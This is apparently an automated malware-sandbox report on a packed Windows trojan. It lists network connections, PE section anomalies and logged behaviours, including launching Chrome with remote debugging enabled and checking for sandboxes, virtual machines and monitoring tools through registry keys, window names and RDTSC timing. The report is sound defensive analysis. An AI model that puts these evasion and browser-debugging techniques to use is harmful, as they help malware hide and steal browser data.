Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.6:49903 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49957 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:50034 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00793EA9 0_3_00793EA9
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: cnerrpdg ZLIB complexity 0.9945773214784795
Source: classification engine Classification label: mal100.troj.evad.winEXE@30/14@40/7
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.4608899751.000055A8028DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2156,i,9665457051021833802,15567055896649109437,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2156,i,9665457051021833802,15567055896649109437,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: file.exe Static file information: File size 4433920 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of cnerrpdg is bigger than: 0x100000 < 0x1bf400

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.c50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cnerrpdg:EW;lnaxhdwz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cnerrpdg:EW;lnaxhdwz:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x43def4 should be: 0x443433
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: cnerrpdg
Source: file.exe Static PE information: section name: lnaxhdwz
Source: file.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0078B221 push cs; retf 0_3_0078C964
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0078B221 push cs; retf 0_3_0078C964
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0078B221 push cs; retf 0_3_0078C964
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0078B221 push cs; retf 0_3_0078C964
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FD7EE0 push dword ptr [eax+04h]; ret 0_2_00FD7F0F
Source: file.exe Static PE information: section name: cnerrpdg entropy: 7.956639043030403

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14C94B3 second address: 14C94B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14E7B8D second address: 14E7B92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14E7D04 second address: 14E7D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14E7EC4 second address: 14E7EFA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F27A8DEEC26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jl 00007F27A8DEEC26h 0x00000017 jmp 00007F27A8DEEC36h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007F27A8DEEC26h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14E7EFA second address: 14E7F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14E7F03 second address: 14E7F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB14A second address: 14EB14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB22B second address: 14EB22F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB22F second address: 14EB238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
